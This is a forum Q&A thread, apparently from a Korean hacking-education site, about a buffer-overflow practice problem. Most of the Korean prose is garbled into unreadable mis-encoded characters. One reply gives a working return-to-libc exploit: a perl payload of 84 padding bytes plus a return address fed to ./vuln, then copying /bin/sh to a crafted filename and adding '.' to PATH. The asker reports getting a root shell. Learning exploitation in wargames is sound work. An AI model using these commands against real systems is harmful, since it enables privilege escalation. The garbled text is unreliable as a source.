|
|
|
|
|
|
|
|
|
|
|
|
|
1574, 9/79 |
|
ygw0225 | |||||||
BOFÇÚµåºÏ ¸¶Áö¸·½Ç½À¹®Á¦ Áú¹®.. | |||||||
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1725 [º¹»ç]
Hit : 3343 Date : 2014/01/08 01:34
|
|||||||
cd80 | ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÇϽŴÙÀ½¿¡ xxd ./asdfasdf ¿¡¼ ¸»¾¸ÇϽŠÀÌ»óÇѹ®ÀÚÀÇ Çí½º¿À» ãÀ¸½Å´ÙÀ½¿¡ cp /bin/sh $(perl -e 'print "\x~~\x~~\x~~"') ÀÌ·±½ÄÀ¸·Î /bin/sh¸¦ ±× ÀÌ»óÇѹ®ÀÚ·Î º¹»çÇϽŴÙÀ½¿¡ export .:$PATH ÇÏ½Ã°í ´Ù½Ã ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` Çغ¸¼¼¿ä |
2014/01/08 | |
ygw0225 | ¿Í¿ì °¨»çÇÕ´Ï´Ù! ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼ root½©À» ȹµæÇÏ°Ô µÇ¾ú½À´Ï´Ù. ±×·±µ¥ Á¦°¡ ¿Ïº®ÇÏ°Ô ÀÌÇظ¦ ÇÏÁö¸øÇÏ¿´½À´Ï´Ù; Áú¹® ¸î°¡Áöµå¸®°Ú½À´Ï´Ù. 1. À§´ñ±Û·Î ¸»¾¸ÇØÁֽŠÇØ°áÃ¥À» ¶È°°ÀÌ ÇÏ¿´´Âµ¥¿ä ¸»¾¸ÇϽŴë·Î ÇÏ°í³ª¼ ´Ù¼¸¹ø°ÁÙ(À§´ñ±Û¿¡¼) ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ÀÔ·ÂÇÏ¸é ¹Ù·Î root½©À» ȹµæÇÏ°Ô µÇ´Â°Ç°¡¿ä ¾Æ´Ï¸é syntax error ¸¦ sh: ?¿C?? command not found ·Î °Á¿¡¼Ã³·³ ³ª¿À°Ô ÇϱâÀ§ÇÑ °úÁ¤Àΰ¡¿ä? ¸»¾¸ÇϽŴë·Î µû¶óÇÏ°í³ª´Ï sh: ?¿C?? command not found ·Î ³ª¿Í¼ system()»çÀÌ¿¡ Çí½º¿À» È®ÀÎÇؼ ¸µÅ©ÆÄÀÏÀ» ¸¸µé¾î ¿¬°á½ÃÄÑ È®ÀÎÀ»Çß½À´Ï´Ù...°á±¹ °°Àº°ÍÀ» ¹Ýº¹ÇØ¾ß Çϴ°ǰ¡¿ä? 2. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` > ./asdfasdf ÀÌ·¸°Ô ÇÒ°æ¿ì ÆÄÀÏÀº ¸¸µé¾îÁö´Âµ¥ xxd asdfasdf ÇÏ¸é ¾Æ¹«°Íµµ ¾È¶å´Ï´Ù 2>asdfasdf .. ±×·¯´Ï±î 2¸¦ ¾Õ¿¡ ºÙ¿©¾ß xxd·Î ÇÒ¶§ Á¦´ë·Î º¸ÀÌ´õ±º¿ä ¹«½¼Â÷ÀÌ°¡Àִ°ÅÁÒ? 3. ./vuln `perl -e 'printf "A"x84 . "\xe0\x8a\x05\x40"'` ¿¡¼ x84¿Í "\xe...»çÀÌ¿¡ÀÖ´Â . (Á¡) ÀÌ°Ô ¹«½¼ÀǹÌÀÌÁÒ? |
2014/01/08 | |
cd80 | 1. ù¹ø° ./vuln ~~~~ Àº sh: ?¿C?? command not found°¡ Æ÷ÇÔµÈ ¿¡·¯¸Þ¼¼Áö¸¦ asdfasdf¿¡ ³Ö´Â ¸í·ÉÀÌ°í ÀÌ sh: ¿Í command »çÀÌ¿¡ ÀÖ´Â ±úÁø ¹®ÀÚ°¡ ½ÇÁ¦·Î system()ÇÔ¼öÀÇ ÀÎÀÚ·Î µé¾î°¡ ÇÁ·Î±×·¥¸íÀ¸·Î ½ÇÇàÇÏ·Á´Ù ½ÇÆÐÇÑ ¹®ÀÚ¿ÀÔ´Ï´Ù µû¶ó¼ ½ÇÁ¦·Î ÀÌ ¹®ÀÚ¿·Î ÇÁ·Î±×·¥À» ¸¸µé¾î ½ÇÇàÇÒ¼ö ÀÖµµ·Ï ÇÕ´Ï´Ù »ç¿ëÇÏ°í °è½Å ¹æ¹ýÀ¸·Î °ø°ÝÇÒ¶© °°Àº °úÁ¤À» ¹Ýº¹ÇØ¾ß ÇÕ´Ï´Ù Áö±Ý »ç¿ëÇÏ°í °è½Å ±â¹ýÀ» RTLÀ̶ó°í Çϴµ¥ https://research.hackerschool.org:8080/Datas/Research_Lecture/[6%C2%F7]_Return_to_Lib_%B1%E2%B9%FD_%C0%CC%C7%D8%C7%CF%B1%E2.txt À̹®¼³ª ±¸±Û¿¡ "rtl °ø°Ý" À̶ó°í °Ë»öÇÏ½Ã¸é ³ª¿À´Â ¹®¼³ª ±ÛµéÀ» º¸½Ã¸é¼ °øºÎÇϽøé ÁÁ½À´Ï´Ù https://research.hackerschool.org:8080/Html/WG_Documents.html ¿©±â¿¡ ½Ã½ºÅÛÇØÅ· °ü·Ã¹®¼°¡ ¸¹À¸´Ï Âü°íÇϼ¼¿ä~ 2. ¾Æ 2>¸¦ ÇÑ°Ç stderr¸¦ ¸®´ÙÀÌ·º¼ÇÇϱâ À§Çؼ ¿´½À´Ï´Ù ¸®´ª½º¿¡¼ fd ¼¼°³°¡ Á¤ÇØÁø¿ëµµ·Î ¾²À̴µ¥ 0Àº stdin, 1Àº stdout, 2´Â stderrÀÔ´Ï´Ù ¿¡·¯¸Þ¼¼Áö¿¡ ÇÁ·Î±×·¥¸íÀÌ ÀÖÀ¸´Ï stderr¸¦ ¸®´ÙÀÌ·º¼Ç ÇؾßÇÕ¤¤µð¤¿ 3. Á¡Àº À߸ø½è³×¿ä ¤»¤» Á¡À¸·Îµµ µÇ±ä Çϴµ¥ ¹®ÀÚ¿ µÎ°³¸¦ À̾îÁÖ´Â ¹®¹ýÀÔ´Ï´Ù ½°Ç¥·Îµµ µÇ°í Á¡À¸·Îµµ µË´Ï´Ù |
2014/01/11 | |
ygw0225 | cd80´Ô!//Á¤¸»°¨»çÇÕ´Ï´Ù...Â÷±ÙÂ÷±Ù Çϳª¾¿ ¹è¿ì·Á°íÇϴµ¥, ¿ª½Ã ½±Áø¾Ê³×¿ä^^; | 2014/01/11 | |
|
|